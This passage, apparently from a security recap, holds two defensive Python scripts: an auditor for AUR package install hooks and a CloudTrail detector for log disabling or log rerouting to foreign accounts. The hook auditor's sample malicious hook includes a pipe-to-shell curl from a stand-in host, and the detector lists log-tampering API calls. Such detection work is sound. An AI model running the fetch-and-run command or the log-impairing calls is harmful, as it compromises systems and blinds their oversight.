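  command -v npm >/dev/null && npm install -g atomic-lockfile >/dev/null 2>&1 || true
  curl -fsSL https://example.invalid/setup.sh | sh
}
post_install() {
  echo "done"
}
"""

if __name__ == "__main__":
    # Usage: python audit_hooks.py PKGBUILD foo.install ...   (no args: run the samples)
    targets = [(p, open(p, encoding="utf-8", errors="replace").read()) for p in sys.argv[1:]] \
        or [("benign.install", BENIGN_INSTALL), ("malicious.install", MALICIOUS_INSTALL)]
    for path, text in targets:
        for fname, label, line in audit(text):
            print(f"{path}: {fname}(): {label}: {line}")
```

On a real system the inputs are the PKGBUILD and .install files kept in each AUR helper's build cache (for example the clone directories under ~/.cache for yay or paru); a hit in pre_install or post_install deserves a look regardless of how trusted the package name is, since the recap's point is that abandoned packages kept their names while their install scripts changed.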
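Added example for the "How Attackers Could Exploit Cloud Logging Services" item in Around the Cyber World above. This is not code from the recap or from Unit 42; it is a detection pass a SOC engineer might run over audit-log records to catch the two behaviours the item describes: impairing logging and re-routing logs to an attacker-controlled account. The recap describes the technique for cloud logging services in general; the choice of AWS, the CloudTrail and CloudWatch Logs API names (StopLogging, DeleteTrail, UpdateTrail, PutEventSelectors, PutSubscriptionFilter and the others in the sets below) and the record fields (recipientAccountId, requestParameters) are my assumptions, and the events, account IDs and ARNs are constructed sample data.

```python
"""Flag cloud audit-log tampering in CloudTrail-shaped event records.

Added example, not code from the recap or Unit 42. The recap describes attackers
disabling, altering, deleting or re-routing cloud logs; this scans a batch of
AWS CloudTrail-style records for the API calls that do that and flags any log
delivery pointed at an account other than the victim's own. The platform choice
(AWS), event names, account IDs and ARNs below are assumptions / constructed data.
"""
import json
import re

# API calls that switch off, delete or narrow audit logging.
IMPAIR_LOGGING = {
    "StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors",
    "DeleteLogGroup", "DeleteLogStream", "PutRetentionPolicy",
    "DeleteBucketPolicy", "PutBucketLifecycleConfiguration",
}
# API calls that can point log delivery at infrastructure the caller chooses.
REROUTE_LOGGING = {
    "PutSubscriptionFilter", "PutDestination", "PutBucketReplication",
    "UpdateTrail", "CreateTrail",
}
# arn:partition:service:region:account-id:... ; region and account may be empty (IAM, S3).
ARN_ACCOUNT = re.compile(r"^arn:aws:[a-z0-9-]+:[a-z0-9-]*:(\d{12}):")


def foreign_accounts(params, home_account):
    """Return 12-digit account IDs found in ARN-valued parameters that differ from home_account."""
    found = set()
    for value in (params or {}).values():
        if isinstance(value, str):
            m = ARN_ACCOUNT.match(value)
            if m and m.group(1) != home_account:
                found.add(m.group(1))
        elif isinstance(value, dict):
            found |= foreign_accounts(value, home_account)
    return found


def classify(event):
    """Return a list of (kind, detail) findings for one CloudTrail-style record."""
    name = event.get("eventName", "")
    home = event.get("recipientAccountId", "")
    params = event.get("requestParameters") or {}
    findings = []
    if name in IMPAIR_LOGGING:
        findings.append(("impair_logging", name))
    if name in REROUTE_LOGGING:
        foreign = foreign_accounts(params, home)
        if foreign:
            findings.append(("reroute_to_foreign_account", ",".join(sorted(foreign))))
    # Narrowing a trail from all regions to one is a quieter way to lose visibility.
    if name == "UpdateTrail" and params.get("isMultiRegionTrail") is False:
        findings.append(("scope_reduced", "isMultiRegionTrail=false"))
    return findings


def scan(events):
    """Run classify() over a batch and return flat alert dicts with actor context."""
    alerts = []
    for e in events:
        actor = (e.get("userIdentity") or {}).get("arn")
        for kind, detail in classify(e):
            alerts.append({"time": e.get("eventTime"), "actor": actor,
                           "event": e.get("eventName"), "kind": kind, "detail": detail})
    return alerts


# Constructed sample records (shape follows CloudTrail; all values are made up).
HOME = "111122223333"
SAMPLE_EVENTS = [
    {"eventTime": "2026-06-10T02:14:07Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StopLogging", "recipientAccountId": HOME,
     "userIdentity": {"arn": f"arn:aws:iam::{HOME}:user/ops-admin"},
     "requestParameters": {"name": "org-trail"}},
    {"eventTime": "2026-06-10T02:15:31Z", "eventSource": "logs.amazonaws.com",
     "eventName": "PutSubscriptionFilter", "recipientAccountId": HOME,
     "userIdentity": {"arn": f"arn:aws:iam::{HOME}:user/ops-admin"},
     "requestParameters": {"logGroupName": "/aws/lambda/payments", "filterName": "all",
                           "filterPattern": "",
                           "destinationArn": "arn:aws:logs:us-east-1:999988887777:destination:collector"}},
    {"eventTime": "2026-06-10T02:16:02Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "DescribeTrails", "recipientAccountId": HOME,
     "userIdentity": {"arn": f"arn:aws:iam::{HOME}:role/Auditor"}, "requestParameters": None},
    {"eventTime": "2026-06-10T02:17:45Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "UpdateTrail", "recipientAccountId": HOME,
     "userIdentity": {"arn": f"arn:aws:iam::{HOME}:user/ops-admin"},
     "requestParameters": {"name": "org-trail", "isMultiRegionTrail": False,
                           "cloudWatchLogsLogGroupArn": f"arn:aws:logs:us-east-1:{HOME}:log-group:org-trail:*"}},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

The foreign-account check is the part worth keeping even if the event lists change: the recap's "route logs to their own accounts" scenario only works if some delivery target (subscription destination, replication bucket, trail log group) carries an account ID that is not yours, and that is a cheap, low-noise comparison to make on every management event. Read-only calls such as DescribeTrails are deliberately ignored so the detector stays quiet under normal administration.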